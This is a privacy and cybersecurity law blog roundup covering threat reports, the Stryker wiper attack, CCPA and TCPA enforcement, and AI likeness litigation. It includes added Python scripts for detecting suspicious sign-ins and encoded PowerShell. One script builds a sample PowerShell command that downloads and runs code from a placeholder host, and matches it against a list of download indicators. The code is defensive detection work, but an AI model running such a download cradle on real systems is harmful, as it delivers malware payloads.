Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results showed that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees on an ongoing basis of how important it is to protect their usernames and passwords and to be highly vigilant when being asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based: where a threat actor attempts to use an authorized user’s credentials to access a company’s network. Many used agents that the organization did not authorize, a clear indication that it was not the authorized user trying to logon. In addition, 12% of incidents involved a logon from a suspicious location, showing that companies may wish to monitor and block any logon attempts from unauthorized locations, including foreign countries.
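The two signals the Report calls out, an unrecognized client agent and a sign-in from an unapproved location, are cheap to check against sign-in logs. The following Python is an added example and not part of the Report or its tooling; the agent allow-list, the country allow-list, the one-hour window and the sample sign-in records are all constructed assumptions for this illustration. It goes slightly beyond the two signals in the text by also flagging the same account appearing in two countries within a short window, which is the same "suspicious location" idea applied across consecutive sign-ins.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Allow-lists and thresholds are assumptions for this example; replace them
# with the organization's own inventory of sanctioned clients and locations.
APPROVED_AGENTS = {"Microsoft Edge", "Google Chrome", "Outlook"}
ALLOWED_COUNTRIES = {"US", "IE"}
TRAVEL_WINDOW = timedelta(minutes=60)

KV = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample sign-in records (not taken from the Report).
SAMPLE_SIGNINS = [
    'ts="2026-03-10T08:02:11Z" user="jsmith" country="US" agent="Microsoft Edge" result="success"',
    'ts="2026-03-10T08:05:40Z" user="jsmith" country="US" agent="python-requests/2.31" result="success"',
    'ts="2026-03-10T09:14:03Z" user="agarcia" country="RU" agent="Google Chrome" result="success"',
    'ts="2026-03-10T09:20:55Z" user="agarcia" country="IE" agent="Outlook" result="success"',
    'ts="2026-03-10T11:30:00Z" user="mlee" country="BR" agent="curl/8.4" result="failure"',
]


def parse_signin(line):
    """Turn one key="value" record into a dict with a parsed UTC timestamp."""
    rec = dict(KV.findall(line))
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def triage(lines):
    """Return the sign-ins that trip at least one rule, with reasons and a response."""
    records = sorted((parse_signin(l) for l in lines), key=lambda r: r["ts"])
    last_seen = {}  # user -> (country, ts) of the most recent successful sign-in
    flagged = []
    for rec in records:
        reasons = []
        if rec["agent"] not in APPROVED_AGENTS:
            reasons.append("unapproved-agent")
        if rec["country"] not in ALLOWED_COUNTRIES:
            reasons.append("unapproved-location")
        prev = last_seen.get(rec["user"])
        if prev and prev[0] != rec["country"] and rec["ts"] - prev[1] <= TRAVEL_WINDOW:
            reasons.append("rapid-location-change")
        # Only a successful sign-in establishes where the account "is".
        if rec["result"] == "success":
            last_seen[rec["user"]] = (rec["country"], rec["ts"])
        if reasons:
            # A successful sign-in that trips a rule means a session may already
            # exist; a failed one can simply be blocked at the source.
            action = "revoke-sessions-and-reset" if rec["result"] == "success" else "block-source"
            flagged.append({"user": rec["user"], "ts": rec["ts"].isoformat(),
                            "reasons": reasons, "action": action})
    return flagged


def summarize(flagged):
    """Count how often each rule fired, for reporting."""
    counts = Counter(r for f in flagged for r in f["reasons"])
    return dict(counts)


if __name__ == "__main__":
    hits = triage(SAMPLE_SIGNINS)
    for h in hits:
        print(h["ts"], h["user"], ",".join(h["reasons"]), "->", h["action"])
    print(summarize(hits))
```

The distinction between a successful and a failed sign-in matters for the response: blocking the source address handles the failed attempt, but a successful sign-in from an unapproved client or location means credentials are already in use and the sessions need to be revoked and the password reset.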

The Report notes that “fake PDF editors continue to be a major problem.” If a user does not have access to a company-sanctioned PDF editor, that user may search the Internet for one to make editing a PDF easier. A user who downloads a fake PDF editor like SupremePDF is unaware that it can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the threat actor downloads the second payload, it can then move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along to users as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.
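The behaviour Expel describes, a trojanized editor spawning PowerShell with an encoded command that fetches a second payload, leaves a recognizable trace in process-creation telemetry. The following Python is an added detection example, not Expel's tooling or anything from the report: it decodes the `-EncodedCommand` argument (base64 of UTF-16LE text) and looks for download indicators, and separately flags PowerShell whose parent is an application that has no business launching it. The parent-process watchlist, the indicator list, the placeholder URL and the three sample records are constructed assumptions; the encoded strings are built in the block so the sample is reproducible.

```python
import base64
import re

# Indicators of a second-stage download inside a decoded command (assumption: tune to your environment).
DOWNLOAD_INDICATORS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                       "net.webclient", "start-bitstransfer", "invoke-expression", "iex ")
# Parent executables that should never spawn PowerShell (assumption; the name comes from the post above).
SUSPECT_PARENTS = ("supremepdf.exe",)

# PowerShell accepts abbreviated switch names, so match the common short forms too.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
KV = re.compile(r'(\w+)="([^"]*)"')

# Constructed sample: Sysmon-style process-creation records flattened to key="value" pairs.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
CRADLE_B64 = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
BENIGN_B64 = base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii")
PS = 'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
SAMPLE_LOG = [
    PS + 'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1" '
         'ParentImage="C:\\Windows\\System32\\svchost.exe"',
    PS + 'CommandLine="powershell.exe -nop -w hidden -enc ' + CRADLE_B64 + '" '
         'ParentImage="C:\\Program Files\\SupremePDF\\SupremePDF.exe"',
    PS + 'CommandLine="powershell.exe -EncodedCommand ' + BENIGN_B64 + '" '
         'ParentImage="C:\\Program Files\\AdminTool\\AdminTool.exe"',
]


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if there is none or it is malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(line):
    """Apply the three rules to one record and return findings plus a severity."""
    rec = dict(KV.findall(line))
    parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(rec.get("CommandLine", ""))
    findings = []
    if decoded is not None:
        findings.append("encoded-command")
        if any(ind in decoded.lower() for ind in DOWNLOAD_INDICATORS):
            findings.append("download-cradle")
    if parent in SUSPECT_PARENTS:
        findings.append("unexpected-parent")
    if "download-cradle" in findings or ("encoded-command" in findings and "unexpected-parent" in findings):
        severity = "high"
    elif "encoded-command" in findings:
        severity = "medium"
    else:
        severity = "none"
    return {"parent": parent, "decoded": decoded, "findings": findings, "severity": severity}


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        r = assess(line)
        print(r["severity"], r["parent"], r["findings"], r["decoded"])
```

Encoded PowerShell on its own is only medium severity because administrators and legitimate software use it too; what raises the third record to a confirmed incident in the second record is the combination with a download cradle and an unexpected parent process. A companion rule on service-installation events (new services whose binary lives under the editor's install directory) would cover the persistence step the quoted passage describes.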

If you haven’t scheduled your annual cybersecurity training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users, and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

As we reported last week, Stryker was attacked by Iranian-backed hackers in retaliation for Israeli and U.S. strikes against Iran. It was a significant cyberattack, known as a wiper attack. A wiper attack is designed not to extort money from a victim, but instead to send a message and destroy the victim’s data to cripple their operations. Stryker was a victim of a political attack that had a significant negative effect on its business operations. It was merely conducting business and got caught in the crosshairs of an international war.

Stryker has been transparent about the incident and how it has affected its products. Being a victim of a wiper attack is bad enough. But unfortunately, it became victimized again when, while responding to the cyberattack, it was sued by a former customer service employee alleging that Stryker failed to secure data and alleging a data breach. It is confounding to me to try to understand how the plaintiff can possibly allege a data breach when the attack just happened and an investigation was just starting.

The facts surrounding the Stryker attack will continue to develop, and Stryker will no doubt comply with any legal obligations that ultimately arise from the incident. That said, it is deeply disappointing to see an opportunistic plaintiff and counsel hit Stryker before facts are known, before any notification letters are sent (if even applicable), and while the company was down and actively responding to a significant attack.

Stryker should be allowed the time to assess what happened, respond appropriately, restore its operations, and complete its investigation before anyone determines whether a viable claim exists. Filing suit within days of the incident is premature and only serves as a distraction.

I feel particular empathy toward Stryker, as it took the hit for a political message—something that could have happened to any company. We should learn from this incident and support the company, rather than pile on while it is still working to recover.

The California Privacy Protection Agency (CPPA) issued a decision requiring Ford Motor Company to pay a fine of $375,703 and update its privacy practices following a settlement for its alleged violations of the California Consumer Privacy Act (CCPA). Under the CCPA, California residents have the right to direct a business to stop selling or sharing their personal information by opting out. According to the CPPA’s decision, Ford’s opt-out process for personal information collected through its digital properties and connected vehicle services required an identity verification step. Specifically, consumers had to verify their email address as part of the opt-out workflow. The CPPA concluded this added “unnecessary friction” for consumers trying to exercise their rights.

The result was not just added inconvenience: the CPPA stated that Ford did not process opt-out requests unless the consumer completed the email verification step. Following the CPPA’s investigation, Ford has since processed the opt-out requests that lacked verification. Further, in addition to the monetary fine, Ford must conduct an audit of the tracking technologies on its website and ensure compliance with opt-out preference signals, including the Global Privacy Control.

This enforcement action highlights an increasingly practical regulatory focus. The question is not only whether an opt-out mechanism exists on paper, but also whether it works in a way that consumers can realistically use.

This matter signals that the CPPA is looking at the connected vehicle ecosystems and related digital properties, not just traditional web-only businesses. The lesson here is that if consumers must take extra steps that are not essential to submit or effectuate an opt-out, regulators may view that as deterring a consumer’s ability to exercise their rights.

A federal court in the Southern District of California declined to dismiss wiretapping and eavesdropping claims tied to Skullcandy Inc.’s alleged use of online trackers on its retail website, allowing the lawsuit to move forward. The plaintiff alleges that Skullcandy used tracking tools from Meta Platforms and Google to collect browser and purchase data. Jones v. Skullcandy, Inc., No. 3:2025cv01759 (S.D. Cal. 3/12/26).

The allegations include the use of the Meta Pixel, Google Analytics, and DoubleClick in violation of the California Invasion of Privacy Act. Skullcandy argued the California court lacked jurisdiction, but the district court judge was persuaded that it could exercise specific jurisdiction, focusing on the allegation that Skullcandy aimed its conduct at California through the use of the tracking technologies at issue. Skullcandy sought to transfer the case to Utah, where it has its principal place of business—the court was not convinced. The court focused on the fact that the plaintiff chose to sue in California where the alleged conduct took place, and that the plaintiff expected that class members would be in that state. This decision highlights that venue and jurisdiction defenses may be difficult to win when plaintiffs tie the alleged tracking conduct to the forum state. Even if your website terms of use call out governing law as the state in which you have your principal place of business, you may still be stuck in California court.

A recent class action complaint filed in the Southern District of New York, Angwin v. Superhuman Platform, Inc., No. 26 Civ. 02005, 2026 WL 704131 (S.D.N.Y. 3/11/26), highlights an evolving issue in artificial intelligence (AI) product design: what happens when an AI feature uses a real person’s name or identity as part of the user experience and that identity becomes part of what is being sold?

In the Angwin complaint, the plaintiff (a journalist and editor) alleges that Superhuman (the parent company of the writing assistant tool Grammarly) misappropriated the names and identities of hundreds of journalists, authors, writers, and editors to earn profits. The complaint focuses on Grammarly’s now-disabled “Expert Review” feature, which let subscribers pay for comments attributed to famous writers without their consent, including Angwin herself, Stephen King, and Carl Sagan.

The complaint underscores that AI risk is not limited to AI producing output. The risk is also about how the product attributes that output to real people. The complaint alleged that the Grammarly app told users it was picking experts to review their draft and then gave feedback as if it came from those named people, including short biographies for those experts. The pleading further describes inline editing-style comments that appear next to passages of the user’s text under an expert’s name, and a deeper view where the product explains that a particular recommendation is “inspired” by the selected expert. The complaint also alleges that the system draws on the experts’ publicly available writing to generate advice the experts did not actually provide. The concern is not only unauthorized use of a name in marketing, but also the possibility that ordinary users could reasonably come away believing they received guidance from, or endorsed by, the named person, even where the person was not involved in the review and might disagree with what is attributed to them.

Much of the conversation surrounding developing or deploying AI products centers on concerns about AI output accuracy and intellectual property infringement. Angwin, however, is a lesson that if an AI tool uses a person’s name as part of the product’s value proposition, especially in a way that reads like participation or endorsement, likeness claims could also be at play. Companies should be mindful of what their AI interface suggests about the source of its output. If the product uses a well-known identity to make a feature seem more credible or relatable, it’s advisable to get permission before using that person’s name in this way. A recognizable name can certainly add value, but Angwin is a reminder that it can also add legal risk.

While a good friend of mine was recently traveling, his flight was cancelled and he was booked on a new flight the next day. He travels a lot and he decided to use some of his hotel loyalty points to stay over at the hotel adjacent to the airport. Checking in, he discovered that more than a million miles had been stolen from his account. It was obviously very distressing, so he asked me to write about it to warn others of this fraud and how it can be prevented.

This type of online fraud is called loyalty fraud. Loyalty fraud is when threat actors steal loyalty points from hotel or airline accounts that store frequent-stay or frequent-flyer miles. In 2023, it was estimated that one in four online fraud attempts included loyalty fraud.

Typically, threat actors gain access to loyalty accounts through phishing tactics that steal the legitimate user’s login credentials. This can be done through fake emails or by redirecting users to fake websites that look legitimate and then requesting their credentials. Threat actors also use credential stuffing, trying usernames and passwords stolen in other breaches against loyalty point accounts.

Once they gain access to the account with legitimate credentials, the threat actor can change the password and lock the user out of the account, redeem the points, or quickly sell the points on the dark web or on social media platforms. It then becomes very difficult to get those points back, as the hotel chain or airline will say there is no evidence that an unauthorized user obtained the points, because the access was obtained through legitimate credentials.

So how do we protect those points that we have been gathering throughout our lifetime?

  • Use strong, unique passwords for all loyalty accounts. Treat the accounts like bank accounts, because that is what they are.
  • Change passwords frequently, like other critical accounts.
  • Enable multi-factor authentication on all loyalty accounts to add an extra layer of security.
  • Monitor loyalty accounts regularly so you can catch any unusual activity in your account.
  • Be cautious when using public Wi-Fi to access loyalty accounts.
  • Don’t provide your username and password unless you are sure you are on the correct site.
  • Use a healthy dose of paranoia before opening an advertisement or when redirected to a hotel or airline website. It is unusual to have to insert a username and password to get access to a deal.
  • Make sure you are logging on to the official website of the hotel or airline.
  • If you receive notice from a hotel or airline that it suffered a data breach, immediately change your password.

Loyalty accounts should be treated no differently than bank accounts. Using the same security techniques you use for other critical accounts will help prevent you from becoming a victim of fraud.

With the background of recent government warnings about increased cyber-attacks from Iranian-backed hackers, the Irish Examiner has reported that the Stryker site located in Cork, Ireland has been hit with a wiper attack by the Iranian-backed Handala Hacking Team.

The Stryker facility in Cork employs approximately 5,000 individuals and “has been crippled by a cyberattack” being described as a wiper attack, which wipes all of the targeted system’s data and is politically motivated.

According to the Irish Examiner, the Cork Stryker site’s IT systems have been “shut down” and Stryker employee devices have been wiped. The login pages appearing on these devices have been defaced with the Handala logo. The attack, believed to be a response to business links with Israel, has affected Stryker’s Microsoft environment.

Israeli media reports that Handala has also claimed responsibility for hacking the Academy of Hebrew Language website, and the Israeli National Cyber Directorate is trying to intercept “a wave of Iranian cyberattacks on Israeli civilian companies.”

The U.S. government has warned U.S.-based companies to be on heightened alert for Iranian-backed cyberattacks in retaliation for the strikes against Iran. This attack against Stryker makes that warning an urgent reminder to review the warnings and mitigation actions.

The U.S. District Court for the Northern District of Georgia, in Veronica Bramlett, on behalf of herself and all others similarly situated v. RES 360 LLC and Peach City Properties LLC, No. 1:25-CV-3312-MLB (N.D. Ga. Mar. 4, 2026) recently granted in part and denied in part a motion to dismiss a Telephone Consumer Protection Act (TCPA) telephone solicitation claim based on text messages offering to buy the plaintiff’s home.

The complaint alleged that defendants—who offer real estate-related services—sent multiple texts offering to buy the plaintiff’s home and emphasizing a “quick,” “easy,” “hassle-free” transaction, including the ability to close quickly and avoid a public listing. The plaintiff alleged she was on the national do-not-call registry, had no prior relationship with the defendants, had not requested their assistance, and was not interested in selling. The defendants moved to dismiss on the theory that their messages were not telephone solicitations under the TCPA.

The court held the plaintiff plausibly alleged a prohibited purpose because, taking the allegations as true, the defendants’ model was to “take care of all aspects of the transaction” and provide multiple services offered by a real estate agent, charge a fee for those services, and derive profit from that fee. Reading the “hassle-free” and “take the burden off [Plaintiff’s] shoulders” language of the texts in that alleged context, the court found it plausible the texts were intended to encourage the purchase of services and therefore constituted solicitations, even if the texts did not explicitly mention services.

However, the court allowed the claim to proceed only insofar as the plaintiff alleged that the defendants implicitly offered to handle aspects of the transaction in exchange for a fee baked into the home purchase price. The court dismissed other “telephone solicitation” theories, including that the texts were sent to sell other offerings such as loan services, investment opportunities, construction/renovation, conventional brokerage representation, or an option to buy a home from the defendants, because the content of the texts did not support those theories, even considering context and the totality of the allegations.

Bramlett may support a broader point that a marketing text message can be treated as a TCPA telephone solicitation if, in context, it plausibly has the purpose of encouraging the recipient to purchase the sender’s services, even if the message does not explicitly mention those services. Companies sending marketing messages should assess outreach with the expectation that courts may look beyond the face of the message to its context and business model in deciding whether it was sent “for the purpose of encouraging” the purchase of services. On the other hand, plaintiffs may bear the burden of showing a clear nexus between the message content and the solicitation theory, and broad theories untethered to what the messages actually say risk dismissal. Bramlett underscores that how a message reads in context, and not just what it says expressly, matters.

Microsoft Threat Intelligence issued a report on March 6, 2026, entitled, “AI as tradecraft: How threat actors operationalize AI,” which outlines how threat actors, including those from North Korea, are “operationalizing AI along the cyberattack lifecycle…to bypass safeguards and perform malicious activity.” The threat actors are adopting AI “as operational enablers, embedding AI into their workflows to increase the speed, scale, and resilience of cyber operations.”

The report details how the North Korean remote IT worker schemes dubbed Jasper Sleet and Coral Sleet provide the threat actors with “sustained, large-scale misuse of legitimate access through identity fabrication, social engineering, and long-term operational persistence at low cost.” The threat actors are also experimenting with agentic AI, which could “complicate detection and response.”

The report outlines how the threat actors have incorporated automation into their schemes across the attack lifecycle to ensure North Korean threat actors are “hired, stay hired, and misuse access at scale” at global companies.

The report is a must-read for any company that has been hit before by the North Korean tech worker scheme, and for those that have not yet been hit but recruit remote workers for technology positions.

The Washington Post has published a report detailing a whistleblower complaint alleging that a former Department of Government Efficiency (DOGE) employee stole two complete databases from the U.S. Social Security Administration while employed as a DOGE software engineer.

The databases stolen include the “’Numident’ and the ‘Master Death File,’ which could cover records for more than 500 million living and dead Americans, including Social Security numbers and birth data.”

First of all, how did a software engineer even have access to these databases that contain highly sensitive data, and then have the ability to download massive amounts of data on 500 million individuals to a thumb drive? My head is exploding.

Second, the whistleblower alleges that the software engineer left DOGE in October 2025 to start a new job at a government contractor, “where he told colleagues he ‘possessed two tightly restricted databases of U.S. citizens’ information’ and planned to share that information with his new employer.” If the software engineer did so, not only are both acts against the law, but they are also separate unauthorized disclosures that may require notification to every person whose data is contained in those databases. My head is imploding now too.

The Social Security Administration inspector general is allegedly investigating the whistleblower’s complaint, but the allegations are extremely alarming, and an investigation is not sufficient. Who knows how long it will take for the investigation to conclude? Meanwhile, if true, potentially all of our Social Security data on a thumb drive is in the hands of a software engineer, who clearly does not understand the importance and consequences of their actions, and potentially the individual’s new employer. Laws have been passed to protect our Social Security information for a reason. We expect it to be protected and accessed, used, and disclosed in accordance with the law. If true, this situation underscores how important those laws are, and how detrimental it is when they are broken with impunity.